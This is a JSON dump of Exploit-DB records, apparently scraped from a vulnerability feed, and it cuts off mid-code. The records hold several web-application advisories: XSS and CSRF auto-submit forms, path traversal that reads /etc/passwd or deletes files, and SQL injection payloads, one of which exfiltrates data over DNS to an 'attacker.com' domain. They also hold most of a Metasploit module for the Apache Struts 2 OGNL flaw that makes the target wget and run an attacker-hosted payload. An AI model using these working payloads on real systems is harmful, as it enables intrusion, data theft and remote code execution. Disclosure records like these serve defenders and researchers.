action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-int\r\negration/ls/lb_status.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"s\" value=\"1\">\r\n<input type=\"hidden\" name=\"u\" value=\"1\">\r\n<input type=\"hidden\" name=\"r\" value=\"1\">\r\n<input type=\"hidden\" name=\"m\" value=\"<script>alert('immuniweb')</script>\">\r\n</form>\r\n</body>\r\n\r\n2.2 The vulnerability exists due to insufficient filtration of \"msg\" HTTP POST parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vc_chatl\r\nog.php\" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits the affected page.\r\n\r\nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\n<body onLoad=\"document.hack.submit()\">\r\n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-int\r\negration/ls/vc_chatlog.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"msg\" value=\"<script>alert('immuniweb')</script>\">\r\n<input type=\"hidden\" name=\"r\" value=\"1\">\r\n</form>\r\n</body>\r\n\r\nThe code will be executed when the user visits the following URL:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/uploads/[room]/Log[date].html\r\n\r\nWhere [room] is set by HTTP POST parameter r and [date] is the current date.\r\n\r\n2.3 The vulnerabilities exist due to insufficient filtration of \"n\" HTTP GET parameter passed to scripts \"channel.php\", \"htmlchat.php\", \"video.php\" and \"videotext.php\" within the \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/\" directory. A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/channel.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3\r\nE\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/htmlchat.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%\r\n3E\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/video.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/videotext.php?n=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/sc\r\nript%3E\r\n\r\n2.4 The vulnerability exists due to insufficient filtration of \"message\" HTTP GET parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logou\r\nt.php\" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/lb_logout.php?message=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/\r\nscript%3E\r\n\r\n2.5 The vulnerability exists due to insufficient filtration of \"ct\" HTTP POST parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_statu\r\ns.php\" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\n<body onLoad=\"document.hack.submit()\">\r\n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-int\r\negration/ls/lb_status.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"s\" value=\"1\">\r\n<input type=\"hidden\" name=\"r\" value=\"1\">\r\n<input type=\"hidden\" name=\"ct\" value=\"<script>alert('immuniweb')</script>\">\r\n</form>\r\n</body>\r\n\r\n2.6 The vulnerability exists due to insufficient filtration of \"ct\" HTTP POST parameter passed to \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/v_status\r\n.php\" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\n<body onLoad=\"document.hack.submit()\">\r\n<form name=\"hack\" action=\"http://[host]/wp-content/plugins/videowhisper-live-streaming-int\r\negration/ls/v_status.php\" method=\"post\">\r\n<input type=\"hidden\" name=\"s\" value=\"1\">\r\n<input type=\"hidden\" name=\"r\" value=\"1\">\r\n<input type=\"hidden\" name=\"ct\" value=\"<script>alert('immuniweb')</script>\">\r\n</form>\r\n</body>\r\n\r\n3) Path Traversal in VideoWhisper Live Streaming Integration: CVE-2014-1907\r\n\r\n3.1 The vulnerability exists due to insufficient filtration of \"s\" HTTP GET parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_log\r\nin.php\" script. A remote attacker can view contents of arbitrary files on the target system using directory traversal sequences.\r\n\r\nThe exploitation example below displays contents of \"/etc/passwd\" file:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/rtmp_login.php?s=../../../../../../etc/passwd\r\n\r\n3.2 The vulnerability exists due to insufficient filtration of \"s\" HTTP GET parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_log\r\nout.php\" script. A remote attacker can delete arbitrary files on the target system using directory traversal sequences.\r\n\r\nThe exploitation example below deletes a file \"/tmp/immuniweb\":\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/rtmp_logout.php?s=../../../../../../../../tmp/immuniweb\r\n\r\nSuccessful exploitation of this vulnerability requires that file \"/tmp/immuniweb\" exists on the system.\r\n\r\n4) Information Exposure Through Externally-generated Error Message in VideoWhisper Live Streaming Integration: CVE-2014-1908\r\n\r\n4.1 The vulnerability exists due to improper implementation of error handling mechanisms in multiple scripts. A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and gain knowledge of full installation path of the application.\r\n\r\nThe following URL can be used to gain knowledge of full installation path of the application:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/bp.php\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/videowhisper_streaming.php\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/rtmp.inc.php\r\n\r\n------------------------------------------------------------------------\r\n-----------------------\r\n\r\nSolution:\r\n\r\nUpdate to VideoWhisper Live Streaming Integration version 4.29.5\r\n\r\n------------------------------------------------------------------------\r\n-----------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23089 - https://www.htbridge.com/advisory/HTB23089 - Multiple Vulnerabilities in VideoWhisper Live Streaming Integration Plugin for WordPress.\r\n[2] VideoWhisper Live Streaming Integration - http://wordpress.org/plugins/videowhisper-live-streaming-integration/ - The VideoWhisper Live Streaming software can easily be used to add video broadcasting features to WordPress sites and live video streams on blog pages.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00c2\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00c2\u00ae - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.\r\n\r\n------------------------------------------------------------------------\r\n-----------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/31986/"}, {"lastseen": "2016-02-03T17:48:06", "osvdbidlist": ["104775"], "references": [], "description": "Orbit Open Ad Server 1.1.0 - SQL Injection. CVE-2014-2540. Webapps exploit for php platform", "edition": 1, "reporter": "High-Tech Bridge SA", "published": "2014-04-10T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "Orbit Open Ad Server 1.1.0 - SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2540"], "modified": "2014-04-10T00:00:00", "id": "EDB-ID:32792", "href": "https://www.exploit-db.com/exploits/32792/", "sourceData": "Advisory ID: HTB23208\r\nProduct: Orbit Open Ad Server\r\nVendor: OrbitScripts, LLC\r\nVulnerable Version(s): 1.1.0 and probably prior\r\nTested Version: 1.1.0\r\nAdvisory Publication: March 19, 2014 [without technical details]\r\nVendor Notification: March 19, 2014 \r\nVendor Patch: March 21, 2014 \r\nPublic Disclosure: April 9, 2014 \r\nVulnerability Type: SQL Injection [CWE-89]\r\nCVE Reference: CVE-2014-2540\r\nRisk Level: High \r\nCVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in Orbit Open Ad Server, which can be exploited to perform SQL Injection attacks, alter SQL requests to database of vulnerable application and potentially gain control over the vulnerable website.\r\n\r\n1) SQL Injection in Orbit Open Ad Server: CVE-2014-2540\r\n\r\nInput passed via the \"site_directory_sort_field\" HTTP POST parameter to \"/guest/site_directory\" URL is not properly sanitised before being used in SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL commands.\r\n\r\nThe PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\n\r\n<form action=\"http://[host]/guest/site_directory\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"active_form\" value=\"site_directory_form\">\r\n<input type=\"hidden\" name=\"ad_type_filter\" value=\"text\">\r\n<input type=\"hidden\" name=\"category_filter\" value=\"1\">\r\n<input type=\"hidden\" name=\"cost_model_filter\" value=\"cpm\">\r\n<input type=\"hidden\" name=\"form_mode\" value=\"save\">\r\n<input type=\"hidden\" name=\"image_size_filter\" value=\"12\">\r\n<input type=\"hidden\" name=\"keyword_filter\" value=\"1\">\r\n<input type=\"hidden\" name=\"site_directory_page\" value=\"1\">\r\n<input type=\"hidden\" name=\"site_directory_per_page\" value=\"10\">\r\n<input type=\"hidden\" name=\"site_directory_sort_direction\" value=\"asc\">\r\n<input type=\"hidden\" name=\"site_directory_sort_field\" value=\"(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))\">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\nThe second PoC code works against any platform (UNIX/Windows) and uses blind SQL injection brute-force (dichotomy) technique to extract data from the database:\r\n\r\n\r\n<form action=\"http://[host]/guest/site_directory\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"active_form\" value=\"site_directory_form\">\r\n<input type=\"hidden\" name=\"ad_type_filter\" value=\"text\">\r\n<input type=\"hidden\" name=\"category_filter\" value=\"1\">\r\n<input type=\"hidden\" name=\"cost_model_filter\" value=\"cpm\">\r\n<input type=\"hidden\" name=\"form_mode\" value=\"save\">\r\n<input type=\"hidden\" name=\"image_size_filter\" value=\"12\">\r\n<input type=\"hidden\" name=\"keyword_filter\" value=\"1\">\r\n<input type=\"hidden\" name=\"site_directory_page\" value=\"1\">\r\n<input type=\"hidden\" name=\"site_directory_per_page\" value=\"10\">\r\n<input type=\"hidden\" name=\"site_directory_sort_direction\" value=\"asc\">\r\n<input type=\"hidden\" name=\"site_directory_sort_field\" value=\"(SELECT IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=0,1, BENCHMARK(22000000,MD5(NOW()))))\">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to Orbit Open Ad Server 1.1.1\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23208 - https://www.htbridge.com/advisory/HTB23208 - SQL Injection in Orbit Open Ad Server.\r\n[2] Orbit Open Ad Server - http://orbitopenadserver.com/ - the free, open source ad tool that lets you manage the profits while we manage the technology.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00c2\u017d is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00c2\u017d - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/32792/"}, {"lastseen": "2016-02-03T17:37:19", "osvdbidlist": ["104402"], "references": [], "description": "Wordpress XCloner Plugin 3.1.0 - CSRF Vulnerability. CVE-2014-2340. Webapps exploit for php platform", "edition": 1, "reporter": "High-Tech Bridge SA", "published": "2014-04-04T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "exploitdb", "title": "WordPress XCloner Plugin 3.1.0 - CSRF Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2340"], "modified": "2014-04-04T00:00:00", "id": "EDB-ID:32701", "href": "https://www.exploit-db.com/exploits/32701/", "sourceData": "Advisory ID: HTB23206\r\nProduct: XCloner Wordpress plugin\r\nVendor: XCloner\r\nVulnerable Version(s): 3.1.0 and probably prior\r\nTested Version: 3.1.0\r\nAdvisory Publication: March 12, 2014 [without technical details]\r\nVendor Notification: March 12, 2014 \r\nVendor Patch: March 13, 2014 \r\nPublic Disclosure: April 2, 2014 \r\nVulnerability Type: Cross-Site Request Forgery [CWE-352]\r\nCVE Reference: CVE-2014-2340\r\nRisk Level: Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in XCloner Wordpress plugin, which can be exploited to perform a CSRF attack and gain access to a backed-up copy of vulnerable website.\r\n\r\n\r\n\u0421ross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin: CVE-2014-2340\r\n\r\nThe vulnerability exists due to insufficient verification of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create a website backup.\r\n\r\nSimple exploit code below will create new backup with all website files (no SQL database), which will be publicly accessible on the http://[host]/administrator/backups/backup.tar URL: \r\n\r\n\r\n<form action=\"http://[host]/wp-admin/plugins.php?page=xcloner_show&option=com_cloner&task=confirm\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"dbbackup\" value=\"1\">\r\n<input type=\"hidden\" name=\"dbbackup_comp\" value=\"\">\r\n<input type=\"hidden\" name=\"bname\" value=\"backup\">\r\n<input type=\"hidden\" name=\"backupComments\" value=\"\">\r\n<input type=\"hidden\" name=\"option\" value=\"com_cloner\">\r\n<input type=\"hidden\" name=\"task\" value=\"generate\">\r\n<input type=\"hidden\" name=\"boxchecked\" value=\"0\">\r\n<input type=\"hidden\" name=\"hidemainmenu\" value=\"0\">\r\n<input type=\"hidden\" name=\"\" value=\"\">\r\n<input type=\"submit\" name=\"run\" value=\"run\">\r\n</form>\r\n<script>\r\ndocument.main.submit();\r\n</script>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to XCloner 3.1.1\r\n\r\nMore Information:\r\nhttp://www.xcloner.com/support/download/?did=9\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23206 - https://www.htbridge.com/advisory/HTB23206 - \u0421ross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin.\r\n[2] XCloner Wordpress plugin - http://www.xcloner.com - XCloner is a professional website Backup and Restore application designed to allow you to create safe complete backups of any PHP/Mysql website and to be able to restore them anywhere. It works as a native Joomla backup component, as a native Wordpress backup plugin and also as standalone PHP/Mysql backup application.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/32701/"}, {"lastseen": "2016-02-03T15:35:47", "osvdbidlist": ["103578"], "references": [], "edition": 1, "description": "Wordpress AdRotate Plugin 3.9.4 - (clicktracker.php track param) SQL Injection. CVE-2014-1854. Webapps exploit for php platform", "reporter": "High-Tech Bridge SA", "published": "2014-02-22T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "exploitdb", "title": "WordPress AdRotate Plugin 3.9.4 - clicktracker.php track param SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1854"], "modified": "2014-02-22T00:00:00", "id": "EDB-ID:31834", "href": "https://www.exploit-db.com/exploits/31834/", "sourceData": "Advisory ID: HTB23201\r\nProduct: AdRotate\r\nVendor: AJdG Solutions\r\nVulnerable Version(s): 3.9.4 and probably prior\r\nTested Version: 3.9.4\r\nAdvisory Publication: January 30, 2014 [without technical details]\r\nVendor Notification: January 30, 2014 \r\nVendor Patch: January 31, 2014 \r\nPublic Disclosure: February 20, 2014 \r\nVulnerability Type: SQL Injection [CWE-89]\r\nCVE Reference: CVE-2014-1854\r\nRisk Level: High \r\nCVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in AdRotate, which can be exploited to perform SQL Injection attacks.\r\n\r\n\r\n1) SQL Injection in AdRotate: CVE-2014-1854\r\n\r\nThe vulnerability exists due to insufficient validation of \"track\" HTTP GET parameter passed to\r\n \"/wp-content/plugins/adrotate/library/clicktracker.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nThe following PoC code contains a base64-encoded string \"-1 UNION SELECT version(),1,1,1\", which will be injected into SQL query and will output MySQL server version:\r\n\r\nhttp://[host]/wp-content/plugins/adrotate/library/clicktracker.php?track=LTEgVU5JT04gU0VMRUNUIHZlcnNpb24oKSwxLDEsMQ==\r\n\r\nSuccessful exploitation will result in redirection to local URI that contains version of the MySQL server:\r\nhttp://[host]/wp-content/plugins/adrotate/library/5.1.71-community-log\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to AdRotate 3.9.5\r\n\r\nMore Information:\r\nhttp://www.adrotateplugin.com/2014/01/adrotate-pro-3-9-6-and-adrotate-free-3-9-5/\r\nhttp://wordpress.org/plugins/adrotate/changelog/\r\nhttp://www.adrotateplugin.com/development/\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23201 - https://www.htbridge.com/advisory/HTB23201 - SQL Injection in AdRotate.\r\n[2] AdRotate - http://wordpress.org/plugins/adrotate/ - AdRotate for WordPress.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00c2\u017d is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00c2\u017d - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/31834/"}, {"lastseen": "2016-02-03T05:11:59", "osvdbidlist": ["95405"], "references": [], "edition": 1, "description": "Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution. CVE-2013-2251. Remote exploits for multiple platform", "reporter": "metasploit", "published": "2013-07-27T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2251"], "modified": "2013-07-27T00:00:00", "id": "EDB-ID:27135", "href": "https://www.exploit-db.com/exploits/27135/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::HttpServer\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution',\r\n 'Description' => %q{\r\n The Struts 2 DefaultActionMapper supports a method for short-circuit navigation\r\n state changes by prefixing parameters with \"action:\" or \"redirect:\", followed by\r\n a desired navigational target expression. This mechanism was intended to help with\r\n attaching navigational information to buttons within forms.\r\n\r\n In Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\" or\r\n \"redirectAction:\" is not properly sanitized. Since said information will be\r\n evaluated as OGNL expression against the value stack, this introduces the\r\n possibility to inject server side code.\r\n\r\n This module has been tested successfully on Struts 2.3.15 over Tomcat 7, with\r\n Windows 2003 SP2 and Ubuntu 10.04 operating systems.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Takeshi Terada', # Vulnerability discovery\r\n 'sinn3r', # Metasploit module\r\n 'juan vazquez' # Metasploit modules\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-2251' ],\r\n [ 'OSVDB', '95405' ],\r\n [ 'BID', '61189' ],\r\n [ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-016.html' ]\r\n ],\r\n 'Platform' => [ 'win', 'linux'],\r\n 'Targets' =>\r\n [\r\n ['Automatic', {}],\r\n ['Windows',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n ['Linux',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux'\r\n }\r\n ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'WfsDelay' => 10\r\n },\r\n 'Stance' => Msf::Exploit::Stance::Aggressive,\r\n 'DisclosureDate' => 'Jul 2 2013',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [true, 'Action URI', '/struts2-blank/example/HelloWorld.action']),\r\n OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 60]),\r\n # It isn't OptPath becuase it's a *remote* path\r\n OptString.new(\"WritableDir\", [ true, \"A directory where we can write files (only on Linux targets)\", \"/tmp\" ])\r\n ], self.class)\r\n end\r\n\r\n def on_new_session(session)\r\n if session.type == \"meterpreter\"\r\n session.core.use(\"stdapi\") unless session.ext.aliases.include?(\"stdapi\")\r\n end\r\n\r\n @dropped_files.delete_if do |file|\r\n false unless file =~ /\\.exe/\r\n win_file = file.gsub(\"/\", \"\\\\\\\\\")\r\n if session.type == \"meterpreter\"\r\n begin\r\n wintemp = session.fs.file.expand_path(\"%TEMP%\")\r\n win_file = \"#{wintemp}\\\\#{win_file}\"\r\n session.shell_command_token(%Q|attrib.exe -r \"#{win_file}\"|)\r\n session.fs.file.rm(win_file)\r\n print_good(\"Deleted #{file}\")\r\n true\r\n rescue ::Rex::Post::Meterpreter::RequestError\r\n print_error(\"Failed to delete #{win_file}\")\r\n false\r\n end\r\n end\r\n end\r\n\r\n super\r\n end\r\n\r\n def start_http_service\r\n #do not use SSL\r\n if datastore['SSL']\r\n ssl_restore = true\r\n datastore['SSL'] = false\r\n end\r\n\r\n if (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\")\r\n srv_host = Rex::Socket.source_address(rhost)\r\n else\r\n srv_host = datastore['SRVHOST']\r\n end\r\n\r\n service_url = srv_host + ':' + datastore['SRVPORT'].to_s\r\n print_status(\"#{rhost}:#{rport} - Starting up our web service on #{service_url} ...\")\r\n start_service({\r\n 'Uri' => {\r\n 'Proc' => Proc.new { |cli, req|\r\n on_request_uri(cli, req)\r\n },\r\n 'Path' => '/'\r\n }\r\n })\r\n\r\n datastore['SSL'] = true if ssl_restore\r\n\r\n return service_url\r\n end\r\n\r\n def check\r\n uri = normalize_uri(target_uri.path)\r\n res = send_request_cgi({\r\n 'uri' => uri,\r\n 'method' => 'GET'\r\n })\r\n\r\n if res.nil? or res.code != 200\r\n print_error(\"#{rhost}:#{rport} - Check needs a valid action, returning 200, as TARGETURI\")\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n proof = rand_text_alpha(6 + rand(4))\r\n\r\n res = send_request_cgi({\r\n 'uri' => \"#{uri}?redirect:%25{new%20java.lang.String('#{proof}')}\",\r\n 'method' => 'GET'\r\n })\r\n\r\n if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n def auto_target\r\n uri = normalize_uri(target_uri.path)\r\n res = send_request_cgi({\r\n 'uri' => uri,\r\n 'method' => 'GET'\r\n })\r\n\r\n if res.nil? or res.code != 200\r\n fail_with(Exploit::Failure::NoTarget, \"#{rhost}:#{rport} - In order to autodetect, a valid action, returning 200, must be provided as TARGETURI, returning 200\")\r\n end\r\n\r\n proof = rand_text_alpha(6 + rand(4))\r\n\r\n res = send_request_cgi({\r\n 'uri' => \"#{uri}?redirect:%25{new%20java.io.File('.').getCanonicalPath().concat('#{proof}')}\",\r\n 'method' => 'GET'\r\n })\r\n\r\n if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/\r\n if res.headers['Location'] =~ /:\\\\/\r\n return targets[1] # Windows\r\n else\r\n return targets[2] # Linux\r\n end\r\n end\r\n\r\n fail_with(Exploit::Failure::NoTarget, \"#{rhost}:#{rport} - Target auto-detection didn't work\")\r\n\r\n end\r\n\r\n def exploit_linux\r\n\r\n downfile = rand_text_alpha(8+rand(8))\r\n @pl = @exe\r\n @pl_sent = false\r\n\r\n #\r\n # start HTTP service if necessary\r\n #\r\n service_url = start_http_service\r\n\r\n #\r\n # download payload\r\n #\r\n fname = datastore['WritableDir']\r\n fname = \"#{fname}/\" unless fname =~ %r'/$'\r\n fname << downfile\r\n uri = normalize_uri(target_uri.path)\r\n uri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'wget','#{service_url}','-O',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\"\r\n\r\n print_status(\"#{rhost}:#{rport} - Downloading payload to #{fname}...\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res.nil? or res.code != 302\r\n fail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\")\r\n 